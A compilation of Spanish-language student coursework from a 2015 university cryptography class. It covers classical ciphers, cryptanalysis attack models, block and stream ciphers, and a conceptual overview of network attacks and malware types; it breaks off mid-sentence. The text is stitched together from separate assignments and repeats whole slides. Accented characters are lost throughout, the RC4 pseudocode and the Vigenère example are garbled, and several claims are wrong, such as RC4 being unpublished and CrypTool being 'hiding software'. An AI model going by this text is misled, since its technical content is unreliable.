Estas tcnicas se utilizan tanto en el Arte como en la Ciencia. Se puede tener como objetivo que la
criptografa era conseguir la confidencialidad de los mensajes. Para ello se disearon sistemas de
cifrado y cdigos. En aquellos tiempos la nica criptografa existente era la llamada criptografa
clsica.
Para ello los criptgrafos investigan, desarrollan y aprovechan tcnicas matemticas que les sirven
como herramientas para conseguir sus objetivos. Los grandes avances que se han producido en el
mundo de la criptografa, han sido posibles gracias a los grandes avances que se han producido en
el campo de la matemtica y la informtica.
CLASIFICACION
Existe una extensa gama de algoritmos criptogrficos pero se observara la siguiente clasificacin:
Esctala.
Polybios.
Son mtodos de cifrado clsico por los cuales los mensajes eran encriptados de manera diferente y
eficaz.

CIFRADO ESCITALA ESPARTANA


El primer caso de cifrado se dio durante la guerra entre Atenas y esparta. El historiador Plutarco
describe a la escitala como un palo o baston en el cual se enrrollaba en espiral una tira de cuero,
donde se escribia un mensaje en columnas paralelas al eje del palo. La tira desenrollada mostraba
un texto sin relacin aparente con el texto inicial, aun asi se poda leer volvindolo a enrollar sobre
un palo similar.

CIFRADO POLYBIOS.
El inventor de este mtodo fue el escritor griego Polybios, el cual fue nombrado como un sistema
criptogrfico, para este mtodo se coloco las letras del alfabeto en una red cuadrada de 5x5 donde
consista en hacer corresponder a cada letra del alfabeto un par de letras que indicaban la fila y la
columna, en la cual aquella se encontraba.

Para este crifrado tendramos un texto como el siguiente:


Texto: deseamos la paz
Cifrado de texto: ADAEDCAEAACBCDDC CAAA CEAAEE

El escritor sugera usar este mtodo para la transmisin de mensajes a larga distancia, el gran xito
de este mtodo consiste en la conversin de letras a nmeros, la reduccin en el numero de
caracteres finales y la divisin de una unidad en dos partes manipulables separadamente.

Bibliografa
FERNANDEZ, S. (ABRIL de 2004). HEZKUNTZA. Obtenido de
http://www.hezkuntza.ejgv.euskadi.eus/r43573/es/contenidos/informacion/dia6_sigma/es_sigma/adjuntos/sigma_24/9_Criptografia
_clasica.pdf
S/N. (SEPTIEMBRE de 2015). WIKIPEDIA. Obtenido de
https://es.wikipedia.org/wiki/Cifrado_cl%C3%A1sico
WIKIMEDIA, F. (OCTUBRE de 2015). WIKIPEDIA. Obtenido de
https://es.wikipedia.org/wiki/Criptograf%C3%ADa

Mtodos de cifrado
Un mtodo de cifrado es un medio para ocultar
un mensaje, donde la letra del mensaje son
sustituidas o transpuestas por otras letras, pares
de letras y algunas veces por muchas letras.

Mtodos de cifrado monolfabetico

Consisten en asignar las letras que van a componer el


mensaje cifrado a las letras del alfabeto en forma
aleatoria, esto no es mas que hacer una permutacin de
las letras del alfabeto.

Clasificacin:

Cifrado de cesar.
Cifrado de Atbash.
Cifrado de Rot13.
Cifrado de Afin.
Cifrado de Fracmason.

Correspondencia entre las letras


criptograma y las del texto en claro

del

CIFRADO DE CESAR
Creado por Julio Cesar en siglo I d.c
Desplaza 3 espacios hacia la derecha el
alfabeto latn
Es un mtodo de cifrado monoalfabetico
por sustitucin
Las operaciones se realizan en un modulo
n.
El modulo n es el numero de alfabetos.

CIFRADO DE CESAR
Alfabeto cifrado de Cesar con mod 27.
Mod 27 se refiere a las posiciones desde 0 a 26
Es muy vulnerable y fcil de atacar
Suma +3 a la posicin, 0+3=3, A equivale a D
Resta -3 para decifrar, 3-3=0, D equivale a A

Ejemplo

ESCUELA SUPERIOR POLITECNICA DE CHIMBORAZO


FACULTAD DE INFORMATICA Y ELECTRONICA
ESCUELA DE INGENIERIA EN SISTEMAS

INTEGRANTES:

Karen Pardo
Jimena Hernandez
Pedro Noboa
Christian Viracocha.
Marlon A. Mosquera
Alexander Baldeon
Danny Moinna

5009
4815
5880
5782
5108
5767
5885

Criptoanlisis
Criptoanlisis viene del griego krypts, escondido y analein, desatar, Es la ciencia
complementaria a la criptografa que se dedica al estudio de sistemas criptogrficos con el fin de
encontrar debilidades en los sistemas y romper su seguridad (obtener la clave secreta) sin el
conocimiento de informacin secreta con el principal objetivo de crear y analizar criptosistemas
ms seguros .
Caractersticas.

Permite encontrar las deficiencias en el sistema


Existe diferentes tcnicas para cada tipo de ataque
Es casi imposible y demasiado costoso descifrar un mensaje totalmente claro
Para realizar el Criptoanlisis se debe conocer el mtodo con el que fue encriptado
Se dice que los cifrados de transposicin son aquellos en los que el texto cifrado
aparece como una mezcla de las letras del mensaje original. Esta mezcla o desorden de
la formacin original puede seguir cualquier estructura o patrn siendo esta la clave del
criptosistema.
Se dice que un Criptoanalisis exitoso influye de gran manera ya que no genera dudas en
la forma o mtodo de encriptacin.
Para saber que tipo de criptoanlisis se usa depende del tipo de criptografa se usa ya
que existe entre ellas: Crip. Simetrica, Crip. Diferencial, Crip. Asimetrica entre otras.
Un buen criptoanlisis ayuda a una mejor encriptacin y ocultamiento de informacin y
hacer el medio de envio y recepcin de informacin mas segura.
Uno de los mtodos ms usados para el uso de cripto anlisis es el software de
ocultamiento llamado Criptool, ya que este nos ayuda de una forma segura de
ocultamiento de informacin.

Mtodos del criptoanlisis


Sirve para la reconstruccin de un mensaje cifrado en texto simple se utiliza mtodos
matemticos, generalmente se distinguen cuatro mtodos de criptoanlisis:
1. Un ataque de slo texto cifrado consiste en encontrar la clave de descifrado utilizando
uno o ms textos cifrados;
2. Un ataque de texto simple conocido consiste en encontrar la clave de descifrado
utilizando uno o ms textos cifrados conociendo el texto correspondiente;
3. Un ataque de texto simple elegido consiste en encontrar la clave de descifrado
utilizando uno o ms textos cifrados. El atacante tiene la opcin de generarlos a partir
de textos simples;
4. Un ataque de texto cifrado elegido consiste en encontrar la clave de descifrado
utilizando uno o ms textos cifrados. El atacante tiene la opcin de generarlos a partir
de los textos simples.

Ejemplo de cifra con cifrado de Csar:

En el siglo I a.d.C., Julio Csar presenta este cifrador cuyo algoritmo consiste en el
desplazamiento de tres espacios hacia la derecha de los caracteres del texto en claro. Es un
cifrador por sustitucin en el que las operaciones se realizan mdulo n, siendo n igual al
nmero de elementos del alfabeto (latn).

Mi
Ci

ABCDEFGHIJKLMNOPQRSTUVWXYZ
DEFGHIJKLMNOPQRSTUVWXYZABC

Cada letra se cifrar siempre igual. Es una gran debilidad y hace que este sistema sea muy
vulnerable y fcil de atacar simplemente usando las estadsticas del lenguaje.
USOS

Se utiliza para referirse a cualquier intento de sortear la seguridad de otros tipos de algoritmos y
protocolos criptogrficos en general, y no solamente el cifrado.
Se lo usa para descifrar comunicaciones encriptadas sin conocer las llaves correctas.
Se lo utiliza para Violar los sistemas criptogrficos.
Se lo utiliza para:
Ataques a textos cifrados (Ciphertext-only attack)
Ataques de texto plano conocidos
Ataques de texto plano seleccionado
Ataque de hombre en medio
Ataques contra el hardware o utilizando el hardware base

CRIPTOANALISIS
Karen Pardo 5009
Jimena Hernandez 4815
Pedro Noboa 5880
Christian Viracocha. 5782
Marlon A. Mosquera (5108
Alexander Baldeon (5767

Que es Criptoanalisis
Criptoanlisis viene del griego krypts,
escondido y analein, desatar
Es la ciencia complementaria a la
criptografa que se dedica al estudio
de sistemas criptogrficos con el fin de
encontrar debilidades en los sistemas y
romper su seguridad (obtener la clave
secreta) sin el conocimiento de informacin
secreta con el principal objetivo de crear y
analizar criptosistemas ms seguros .

Mtodos de criptoanlisis
Para la reconstruccin de un mensaje
cifrado en texto simple se utiliza mtodos
matemticos, generalmente se distinguen
cuatro mtodos de criptoanlisis:

I.

II.

III.

IV.

Un ataque de slo texto cifrado consiste en


encontrar la clave de descifrado utilizando uno o
ms textos cifrados;
Un ataque de texto simple conocido consiste en
encontrar la clave de descifrado utilizando uno o
ms textos cifrados conociendo el texto
correspondiente;
Un ataque de texto simple elegido consiste en
encontrar la clave de descifrado utilizando uno o
ms textos cifrados. El atacante tiene la opcin de
generarlos a partir de textos simples;
Un ataque de texto cifrado elegido consiste en
encontrar la clave de descifrado utilizando uno o
ms textos cifrados. El atacante tiene la opcin de
generarlos a partir de los textos simples.

Caractersticas.

Permite encontrar las deficiencias en el sistema


Existe diferentes tcnicas para cada tipo de
ataque
Es casi imposible y demasiado costoso descifrar un
mensaje totalmente claro
Para realizar el Criptoanlisis se debe conocer el
mtodo con el que fue encriptado
Se dice que los cifrados de transposicin son
aquellos en los que el texto cifrado aparece como
una mezcla de las letras del mensaje original. Esta
mezcla o desorden de la formacin original puede
seguir cualquier estructura o patrn siendo esta la
clave del criptosistema.

Se dice que un Criptoanalisis exitoso influye de


gran manera ya que no genera dudas en la
forma o mtodo de encriptacin.
Para saber que tipo de criptoanlisis se usa
depende del tipo de criptografa se usa ya que
existe entre ellas: Crip. Simetrica, Crip. Diferencial,
Crip. Asimetrica entre otras.
Un buen criptoanlisis ayuda a una mejor
encriptacin y ocultamiento de informacin y
hacer el medio de envio y recepcin de
informacin mas segura.
Uno de los mtodos ms usados para el uso de
cripto anlisis es el software de ocultamiento
llamado Criptool, ya que este nos ayuda de una
forma segura de ocultamiento de informacin.

Usos

Se utiliza para referirse a cualquier intento de sortear la


seguridad de otros tipos de algoritmos y protocolos
criptogrficos en general, y no solamente el cifrado.
Se lo usa para descifrar comunicaciones encriptadas
sin conocer las llaves correctas.
Se lo utiliza para Violar los sistemas criptogrficos.
Se lo utiliza para:
Ataques a textos cifrados (Ciphertext-only attack)
Ataques de texto plano conocidos
Ataques de texto plano seleccionado
Ataque de hombre en medio
Ataques contra el hardware o utilizando el hardware
base

Ejemplo de cifra con cifrado


de Csar
Mi
Ci

ABCDEFGHIJKLMNOPQRSTUVWXYZ
DEFGHIJKLMNOPQRSTUVWXYZABC

ESCUELA SUPERIOR POLITECNICA DE CHIMBORAZO


FACULTAD DE INFORMTICA Y ELECTRNICA
INGENIERA EN SISTEMAS
CRIPTOGRAFA
Integrantes:

Carlos Buay, Ronald Das, Christian Gutirrez, Karina Yumiseba,


Edwin Hernndez, Hernn Pinos.

Fecha: 14/10/2015
CIFRADO POLIALFABTICO
Los sistemas polialfabticos cambian smbolos del texto original por otros smbolos para formar el texto
cifrado. La diferencia con los sistemas monoalfabticos es que no siempre se cambia un smbolo del
texto ariginal por el mismo smbolo en el texto cifrado sino que el smbolo por el que se cambiar
depender del smbolo que se va a sustituir y de la posicin que ocupe.
Los cifrados polialfabticos aplican varias sustituciones monoalfabticas al texto llano. Segn la
posicin del smbolo a cifrar le aplicarn una sustitucin monoalfabtica u otra.
Primero veremos los mtodos generales y luego entraremos en algunos casos particulares tal y como se
detalla a continuacin:

MTODOS POLIALFABTICO

Descripcin en el caso general

o Mtodo de Kasiski
o Mtodo del ndice de Coincidencia
Casos particulares
o Criptosistema de Vigenere
o Cifrado de Beaufort
o Cifrado de llave continua
o Cifrados de Vernam y cuadernos de un slo uso

CASOS PARTICULARES
El cifrado de Vigenre se basa en una matriz cuadrada 26x26 donde aparecen los 26 alfabetos de
desplazamiento correspondientes al alfabeto ordinario de 26 letras. Para poder cifrar lo primero que
hay que hacer es superponer la clave secreta (un texto) sobre el texto plano repitindola tantas veces
como sea necesario. Cada letra del texto plano se sustituir por la letra que le corresponde en el
alfabeto designado de la siguiente forma: El alfabeto seleccionado ser aquel en el que la letra que le
corresponde de la clave es sustituida por la letra 'A'.

CUADRO DE VIGENRE

Ejemplo si la clave es CIELO y el texto en claro es HERMOSO tenemos:


CIELOCIE
HERMOSO
y usando los alfabetos definidos por esas correspondencias tenemos el mensaje cifrado JMVWD UW

BIBLIOGRAFA
http://www.kriptopolis.com/criptografia-clasica-x
https://upload.wikimedia.org/wikipedia/commons/6/6d/VigenereSquare2.jpg

Generalidades

Procedimiento

Ing. Germania Veloz R.

Llamado Block cipher


Un cifrador de bloque es una funcin que mapea
un bloque de texto plano de n-bits a un bloque
de texto cifrado de n-bits.
n es la longitud del bloque.
La funcin es parametrizada por una clave K de
k-bits, tomando valores de un subconjunto del
conjunto Vk de todos los vectores de k-bits.
La funcin debe de ser uno a uno; es decir, esta
funcin debe ser invertible.
El objetivo de un cifrador de bloque es
proporcionar confidencialidad

Unidad de cifrado de
clave simtrica que
opera en grupos de bits
de longitud fija (bloque:
64 a 128 bits).
Su dato de entrada es un
bloque de texto plano o
claro y lo cifra en
bloques de igual tamao.
La transformacin es
controlada por una
segunda entrada CLAVE
secreta.

DES:

Data Encryption Standard


AES: Advanced Encryption Standard
IDEA: International Data Encryption
Algorithm.
RC2
RC5
GOST
Triple DES
KHUFU
SAFER

Cuando

exceden la longitud del bloque se


usan varios modos de operacin para los
cifradores de bloque. El mensaje es dividido
en bloques de n-bits y as cifrar
separadamente uno a uno.
Los ms empleados son:
- Electronics codebook (ECB).
Cipher-block chaining (CBC).
Cipher feedback (CFB).
Output feedback (OFB).

El

mensaje es dividido en bloques.


Cada bloque es cifrado por separado.
Desventaja: En bloques idnticos de texto
plano producir bloques idnticos de texto
cifrado.
No es recomendado para protocolos
criptogrficos.
No proporciona una autntica
confidencialidad.
En protocolos sin proteccin de integridad
pueden ser ms susceptibles a ataques de
repeticin.

Aplica la operacin XOR con el bloque cifrado


anterior antes de ser cifrado.
Cada bloque de texto cifrado depende de todo el
texto plano procesado hasta este punto.
Para hacer de cada mensaje nico se utiliza un
vector de inicializacin.

Mientras el modo CBC procesa texto plano de n-bits


en un tiempo (usando un cifrador de bloques de nbits) algunas aplicaciones requieren que r-bits del
texto plano sean encriptados y transmitidos sin
retraso, para algn r<n (a menudo r=1 o r=8 ), es en
este caso se usa el cifrador de realimentacin.

Usado en aplicaciones que se quiera evitar el


error de propagacin.
Similar al CFB y permite la encriptacin de varios
tamaos del bloque pero difiere en que en este
caso la salida del bloque de encriptacin sirve
como realimentacin.

Un vector de inicializacin (IV) o variable de


inicializacin (SV) es un bloque de bits que es
utilizado por varios modos de operacin para
hacer aleatorio el proceso de encriptacin y
por lo tanto generar distintos textos cifrados
incluso cuando el mismo texto claro es
encriptado varias veces, sin la necesidad de
regenerar la clave, ya que es un proceso lento.

Tiene

requerimientos de seguridad diferentes


a los de la clave, por lo que el IV no necesita
mantenerse secreto.
Es
importante
que
el
vector
de
inicializacin no sea reutilizado con la misma
clave.

Investigar

que es un cifrado de flujo.

http://bibliotecadigital.usbcali.edu.co/jspui

/bitstream/10819/193/1/sistemas_embebido
s.pdf

Definicin

Ing. Germania R. Veloz R.

Tambin se le denomina criptografa privada o


cifrado por bloques.
Se caracteriza por usar la misma clave para
encriptar y desencriptar.

Toda la seguridad est basada en la privacidad de esta


clave

Se apoyan en dos conceptos:


Confusin: tratar de ocultar la relacin que existe
entre el texto normal, el texto cifrado y la clave, es
decir, realizar sustituciones simples
Difusin: trata de repartir la influencia de cada bit
del mensaje original lo ms posible en el mensaje
cifrado, es decir, realizar permutaciones
Estas tcnicas consisten en trocear el mensaje en
bloques de tamao fijo, y aplicar la funcin de cifrado
a cada uno de ellos.
Destacar que la confusin por s sola sera suficiente,
pero ocupara mucha memoria, por lo que sera
inviable.

Es el algoritmo simtrico ms extendido mundialmente.


Codifica bloques de 64 bits empleando claves de 56 bits.
Consta de 16 rondas, ms dos permutaciones, una que se
aplica al principio (Pi) y otra al final (Pf ), tales que la ltima
es la inversa de la primera.
Para descifrar basta con usar el mismo algoritmo empleando el
orden inverso.
Ventajas del algoritmo:
Es muy rpido y fcil de implementar.
Desventajas:
Emplea una clave demasiado corta, lo cual hace que con el
avance actual de los ordenadores, los ataques por la fuerza
bruta se puedan llevar a cabo.

Se han propuesto variantes de este algoritmo para


as aprovechar gran parte de las implementaciones
por hardware existentes de DES. De ellos el que
cabe destacar es:
DES Mltiple:
Consiste en aplicar varias veces el algoritmo DES
con diferentes claves al mensaje original.
El ms comn de todos ellos es el Triple-DES, que
responde a la siguiente estructura:

Codificar con la subclave k1, decodificar con k2 y volver a


codificar con k1. La clave resultante es la concatenacin de k1 y
k2, con una longitud de 112 bits.

Surge

como respuesta ante ataques de fuerza


bruta deDES.
Utiliza tres (3) claves en su operacin.
Tamao de clave de 128 bits.
Genera bloques de cifrado de 64 bits.

Codifica bloques de 64 bits empleando una clave de


128 bits.
Como en el caso de DES, se usa el mismo algoritmo
tanto para cifrar como para descifrar.
Es un algoritmo bastante seguro, y hasta ahora se ha
mostrado resistente a los ataques.
Su longitud de clave hace imposible en la prctica
un ataque por la fuerza bruta como se poda hacer
en el DES.

Consta de ocho rondas.


Dividiremos el bloque
X a codificar, de 64
bits, en cuatro partes
X1, X2, X3 y X4 de 16
bits.
Denominaremos Zi a
cada una de las 52
subclaves de 16 bits
que vamos a necesitar.
Las operaciones que
llevaremos a cabo en
cada ronda, se pueden
apreciar en la figura:

X1

X2

X3

X4

X1

X2

X3

X4

Es

considerado el sucesor de DES.


Este algoritmo se adopt oficialmente en
octubre del 2000 como nuevo Estndar Avanzado
de Cifrado (AES) por el NIST (National Institute
for Standards and Technology) para su empleo
en aplicaciones criptogrficas.
Su nombre se debe a dos autores belgas Joan
Daemen y Vincent Rijmen.

Como peculiaridad tiene que todo el proceso de


seleccin, revisin y estudio tanto de este algoritmo
como de los restantes candidatos, se efectu de
forma pblica y abierta, por lo que, toda la
comunidad criptogrfica mundial ha participado en
su anlisis, lo cual convierte a Rijndael en un
algoritmo perfectamente digno de la confianza de
todos.
AES es un sistema de cifrado por bloques, diseado
para manejar longitudes de clave y de bloque
variables, ambas comprendidas entre los 128 y los
256 bits.

Se basa en aplicar un nmero determinado de rondas a un


valor intermedio que se denomina estado y que se
representar en una matriz rectangular, que posee cuatro filas,
y Nb columnas. A[4,Nb]
La clave tiene una estructura anloga a la del estado, y se
representar mediante una tabla con cuatro filas y Nk
columnas. K[4,Nk]
El bloque que se pretende cifrar o descifrar se traslada a la
matriz de estado y anlogamente, la clave se copia sobre la
matriz de clave
Siendo B el bloque que queremos cifrar, y S la matriz de
estado, el algoritmo AES con n rondas queda como sigue:

1. Calcular K0,K1, Kn subclaves a partir de la clave K.


2. S B K0
3. Para i = 1 hasta n hacer
4.
Aplicar ronda i-sima del algoritmo con la subclave Ki.
Puesto que AES permite emplear diferentes longitudes tanto de
bloque como de clave, el nmero de rondas requerido en cada
caso es variable
Siendo S la matriz de estado, y Ki la subclave correspondiente
a la ronda i-sima, cada una de las rondas posee la siguiente
estructura:
1. S ByteSub(S)
2. S DesplazarFila(S)
3. S MezclarColumnas(S)
4. S Ki S

Funciones DesplazarFila y MezclarColumnas permiten obtener


un alto nivel de difusin a lo largo de varias rondas.
Funcin ByteSub consiste en la aplicacin paralela de s-cajas.
La capa de adicin de clave es un simple or-exclusivo entre el
estado intermedio y la subclave correspondiente a cada ronda.
La ltima ronda es igual a las anteriores, pero eliminando el
paso 3.

El algoritmo de descifrado consistir en aplicar las inversas de


cada una de las funciones en el orden contrario
Es un algoritmo resistente al criptoanlisis tanto lineal como
diferencial y uno de los ms seguros en la actualidad.

DES

3DES

AES

56

112 or 168

128, 192, 256

Key Strength

Weak

Strong

Strong

Processing
Requirements

Moderate

High

Modest

RAM Requirements

Moderate

High

Modest

Key Length (bits)

14

MATERIA:
CRIPTOGRAFIA.

SEMESTRE:
6TO A.

DOCENTE:
ING . GERMANIA VELOZ

REALIZADO POR:
MARLON A. MOSQUERA

5108

Riobamba, 08 De diciembre De 2015

CIFRADO DE FLUJO
INTRODUCCION
Generalmente operan sobre 1 bit (o sobre bytes o palabras de 16 32 bits) de los datos de
entrada cada vez. El algoritmo genera una secuencia (secuencia cifrante o keystream en ingls) de
bits que se emplea como clave. La cifrado se realiza combinando la secuencia cifrante con el texto
en claro.
El paradigma de este tipo de algoritmos es el One Time Pad, que funciona aplicando una XOR (orexclusiva) a cada bit de la entrada junto con otro generado aleatoriamente para obtener cada bit
de la salida. La secuencia de bits aleatorios es la clave de la sesin, secuencia de cifrado o el pad,
que es del mismo tamao que la entrada y la salida. Para recuperar el texto original el texto
cifrado debe pasar por el mismo proceso empleado para cifrar usando el mismo pad. Este
algoritmo es conocido por ser el nico incondicionalmente seguro, aunque, como las claves son
del mismo tamao que la entrada, es de poca utilidad prctica.
DESARROLLO
Siguiendo la propuesta de cifrador hecha en 1917 por Vernam, los cifradores de flujo (clave
secreta) usan:
Una cifra basada en la funcin XOR.
Una secuencia cifrante binaria y aleatoria S que se obtiene de una clave secreta K compartida
por emisor y receptor.
Un algoritmo de descifrado que es igual al de cifrado por la involucin de la funcin XOR.

TIPOS DE ALGORITMOS:
Sistemas ms conocidos:
A5: Algoritmo no publicado propuesto en 1994. Versiones A5/1 fuerte (Europa) y A5/2
dbil (exportacin).
RC4: Algoritmo de RSA Corp. (Rivest Cipher #4) desarrollado en el ao 1987, usado en
Lotus Notes y luego en el navegador de Netscape desde 1999. No es pblico.
SEAL: Algoritmo propuesto por IBM en 1994.

Algoritmo de Cifra A5/1


El uso habitual de este algoritmo lo encontramos en el cifrado del enlace entre el abonado y la
central de un telfono mvil (celular) tipo GSM.
Esta es una consecuencia inevitable en el mundo de la criptografa cuando los desarrolladores de
algoritmos no hacen pblico el cdigo fuente.
Esquema:

CONSIDERACIONES SOBRE EL PERIODO:


El perodo T vendr dado por el mximo comn mltiplo de los tres perodos individuales:

Como n1, n2 y n3 son primos entre s, tambin lo sern los valores


Luego el perodo T ser el producto:

Entonces,
que es un valor demasiado bajo incluso para mediados de la
dcada pasada.

ALGORITMO DE CIFRA RC4


En criptografa RC4 es el cifrado de flujo software ms utilizado y se utiliza en los protocolos
populares como Secure Sockets Layer y WEP. Mientras que destaca por su sencillez y rapidez en el
software, RC4 tiene debilidades que argumentan en contra de su uso en los nuevos sistemas. Es
especialmente vulnerables cuando el comienzo de la secuencia de claves de salida no se descarta,
o cuando no aleatoria o claves relacionadas se utilizan; algunas maneras de utilizar RC4 puede
conducir a criptosistemas muy inseguros tales como WEP.
ESQUEMA:
El algoritmo de clave-programacin se utiliza para inicializar la permutacin de la matriz de "S".
"KeyLength" se define como el nmero de bytes de la clave y puede estar en el intervalo 1 =
KeyLength = 256, tpicamente entre 5 y 16, que corresponde a una longitud de clave de 40 a 128
bits. En primer lugar, la matriz de "S" se inicializa a la permutacin de identidad. S se procesa a
continuacin para 256 iteraciones de una manera similar a la PRGA principal, pero tambin se
mezcla en bytes de la clave al mismo tiempo.

para i entre 0 y 255


S: = i
endfor
j: = 0 para el i de 0 a 255
j: = mod 256 valores de canje de S y S
endfor

ALGORITMO DE CIFRADO SEAL


SEAL es un generador de secuencia diseado en 1993 para IBM por Phil Rogaway y Don
Coppersmith, cuya estructura est especialmente pensada para funcionar de manera eficiente en
computadores con una longitud de palabra de 32 bits.
Su funcionamiento se basa en un proceso inicial en el que se calculan los valores para unas tablas
a partir de la clave, de forma que el cifrado propiamente dicho puede llevarse acabo de una
manera realmente rpida. Por desgracia, tambin es un algoritmo sujeto a patentes.
SEAL se basa en el empleo del algoritmo SHA para generar las tablas que usa internamente. De
hecho, existen dos versiones del algoritmo, la 1.0 y la 2.0, que se diferencian precisamente en que
la primera emplea SRA y la segunda su versin revisada, SHA-l.

ESQUEMA:

Bibliografa
Aguirre, J. (2006). criptosec.unizar.es. Obtenido de
http://criptosec.unizar.es/doc/tema_c3_criptosec.pdf
Gomez, R. (s.f.). CriptoMex. Obtenido de http://cryptomex.org/SlidesCripto/CriptoSimFlujo.pdf
S/N. (2012). Red y Seguridad. Obtenido de http://redyseguridad.fip.unam.mx/proyectos/criptografia/criptografia/index.php/2-tecnicas-clasicas-decifrado/24-formas-de-procesamiento-de-datos/242-cifrador-en-flujo
S/N. (2014). Ecured. Obtenido de http://www.ecured.cu/RC4
Talens-Oliag, S. (s.f.). uv.es. Obtenido de http://www.uv.es/sto/articulos/BEI-200304/criptologia.html#id2440584

MATERIA:
CRIPTOGRAFIA.

SEMESTRE:
6TO A.

DOCENTE:
ING . GERMANIA VELOZ

REALIZADO POR:
MARLON A. MOSQUERA

5108

Riobamba, 01 De diciembre De 2015

DES

TAMAO(BITS)
56

AES

128, 192, 256

3DES

112-168

IDEA

64

RIJNDAEL

128-256

VENTAJAS
Es muy rpido y fcil de
implementarEs uno de los sistemas ms
empleados y extendidos, por
tanto es de los ms probados.

DESVENTAJAS
Emplea una clave
demasiado corta, lo
cual hace que con el
avance actual de los
ordenadores,
los
ataques por la fuerza
bruta se puedan
llevar a cabo.
Es rpido tanto en software Algoritmo
para
como
en
hardware, usuarios de routers,
relativamente
fcil
de ya que WPA opera
implementar, y requiere poca con
AES
como
memoria.
mtodo de cifrado.

Aumenta de forma significativa Requiere


ms
la seguridad del sistema de DES. recursos
del
ordenador.
Repeticin de llaves
Mejor algoritmo de cifrado de Bajo rendimiento en
datos.
software
hace
Existen 2 claves privadas para imprctica
la
probar en ataque de fuerza implantacin de IDEA
bruta.
en dispositivos de
Combina
operaciones bajo
poder
matemticas como XOR, sumas computacional tales
con acarreo de mdulo 2 y como
celulares,
multiplicaciones de mdulo PDA's, etc
2+1, sobre bloques de 16 bits.
Algoritmo perfectamente digno la clave se copia
de la confianza de todos.
sobre la matriz de
Cdigo abierto al pblico.
clave

ESCUELA SUPERIOR POLITECNICA DE CHIMBORAZO


FACULTAD DE INFORMATICA Y ELECTRONICA
ESCUELA DE INGENIERIA EN SISTEMAS

NOMBRE: Karen Pardo


Edwin Hernndez

5009
5887
TRABAJO EN CLASE DE CRIPTOGRAFIA

ATAQUES

TIPOS DE ATAQUES

Seguridad de red
Spoofing
Tecnicas de suplantacion de
identidad

"Hacerse pasar por otro"


Autenticidad - Autentificacin
(Acceso)

Spoofing-Looping
una manera usual es conseguir el
nombre y password de un
usuario legitimo

Suplantar una pagina web

Tipos de Ataques

Web Spoofing

Enruta al usuario hacia otras


paginas web

con el fin de obtener


informacion de la victima

Ataques DOS

Colapsar un sistema
sobrecargandolo de peticiones.

Disponibilidad (DoS)
Ataque DOS distribuido
Ataques DDOS
Multiples equipos "zombis"
Fuerza Bruta

Robo de credenciales
Confidencialidad

Integridad

Robo de cookies

Inyeccion de SQL

Robo de informacion tecnica de


inyeccion

datos proporcionados por el


usuario

Defacement

Vulnerra las entradas

ATAQUES RED
ATAQUE POR INTROMISION

Se da cuando alguien abre archivos uno tras otro en nuestra computadora hasta encontrar
algo que sea de su inters. Puede ser una persona que convive con nosotros.
ATAQUE DE ESPIONAJE EN LINEA

Se da cuando alguien escucha una conversacin y no es invitada a ella. Es muy comn en redes
inalmbricas ya que no se requiere de un dispositivo conectado a la red, basta, con un rango
donde la seal de la red llegue a un automvil o un edificio cercano.
ATAQUE DE INTERSECCION

Se dedica a desviar la informacin a otro punto que no sea el destinatario y as poder revisar
los archivos, informacin y contenidos en un flujo de red.
ATAQUE DE MODIFICACION

Se dedica a alterar la informacin que se encuentra validada en su computadora o base de


datos.es muy comn en los bancos y casa de bolsas.
ATAQUE DE DENEGACION DE SERVICIOS

Se dedican a negarles el uso de los recursos a los usuarios legtimos del sistema, de la
informacin o inclusive de algunas capacidades del sistema como por ejemplo:
- intento de inundar una red, impidiendo el trfico legtimo de red.
- intento de romper la red entre 2 computadoras.
- intento de impedir el acceso de un usuario individual a un servicio.
- intento de romper los servicios a un sistema.
ATAQUE DE SUPLANTACION

Se dedica a dar informacin falsa o anular una transaccin y/o hacerse pasar por un usuario
conocido. Se ha puesto de moda los nuevos ladrones han hecho portales similares a los
bancarios donde las personas han descargado sus datos de tarjetas de crdito sin encontrar
respuesta; posteriormente sus tarjetas son vaciadas.
ATAQUES SOFTWARE
Es un tipo de software que tiene como propsito infiltrarse y daar una computadora o sistema
de informacin sin el consentimiento de los propietarios.
Los malware son considerados en funcin de los efectos que provoquen, incluyendo diferentes
tipos como son:

Virus y Gusanos: stos, son los tipos ms conocidos de software maligno que existen y
se distinguen por la manera en que se propagan. El trmino de virus informtico se
usa para designar un programa que al ejecutarse se propaga infectando otro software
ejecutable de la misma computadora. Pueden tener un playload que realice otras
acciones maliciosas en donde se borran archivos. Los gusanos son programas que se
transmiten as mismos, explotando vulnerabilidades en una red de computadoras para

infectar otros equipos. Su principal objetivo, es infectar a la mayor cantidad posible de


usuarios y tambin puede contener instrucciones dainas al igual que los virus. A
diferencia que los gusanos, un virus necesita la intervencin del usuario para
propagarse, mientras que los gusanos se propagan automticamente.

Backdoor o Puerta Trasera: Es un mtodo para eludir los procedimientos habituales


de autenticacin al conectarse en una computadora. Una vez que el sistema ha sido
comprometido, puede instalarse una puerta trasera para permitir un acceso remoto
ms fcil en el futuro de los atacantes. Los crackers suelen usar puertas traseras para
asegurar el acceso remoto a una computadora, permaneciendo ocultos ante posibles
inspecciones, utilizando troyanos, gusanos u otros mtodos.

Drive-by Downloads: Son sitios que instalan spyware o cdigos que dan informacin
de los equipos. Generalmente se presentan como descargas que de algn tipo, se
efectan sin consentimiento del usuario, lo cual ocurre al visitar un sitio web, al revisar
un mensaje de correo o al entrar a una ventana pop-up. El proceso de ataque Drive-by
Downloads se realiza de manera automtica mediante herramientas que buscan en los
sitios web alguna vulnerabilidad e insertan un script malicioso dentro del cdigo
HTML.

Rootkits: Es un software que modifica el sistema operativo de la computadora, para


permitir que el malware permanezca oculto al usuario, evitando que el proceso
malicioso sea visible en el sistema.

Troyanos: Es un software malicioso que permite la administracin remota de una


computadora de forma oculta y sin el consentimiento del propietario. Generalmente
estn disfrazados como algo atractivo o inocuo que invitan al usuario a ejecutarlo.
Pueden tener un efecto inmediato y tener consecuencias como el borrado de archivos
del usuario e instalar ms programas maliciosos. Son usados para empezar la
propagacin de un gusano, inyectndolo de forma local dentro del usuario.

Hijackers: Son programas que realizan cambios en la configuracin del navegador web,
cambiando la pgina de inicio por pginas con publicidad, pornogrficas u otros re
direccionamientos con anuncios de pago o pginas de phishing bancario. sta es una
tcnica que suplanta al DNS, modificando archivos hosts, para redirigir el dominio de
una o varias pginas a otras, muchas veces una web falsa que imita a la verdadera.
Comnmente es utilizada para obtener credenciales y datos personales mediante el
secuestro de una sesin.

Keyloggers y Stealers: Estos programas estn encaminados al aspecto financiero, la


suplantacin de personalidad y el espionaje. Los Keyloggers monitorizan todas las
